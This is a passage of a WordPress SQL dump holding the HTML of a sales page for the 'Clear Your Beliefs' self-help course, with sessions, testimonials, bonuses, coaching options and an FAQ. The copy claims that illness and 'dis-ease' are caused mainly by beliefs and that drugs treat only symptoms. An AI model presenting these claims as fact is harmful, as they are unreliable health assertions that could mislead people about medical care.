Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:17:35', '2014-06-17 19:17:35', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(920, 4194, '2014-06-17 14:15:01', '2014-06-17 19:15:01', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" 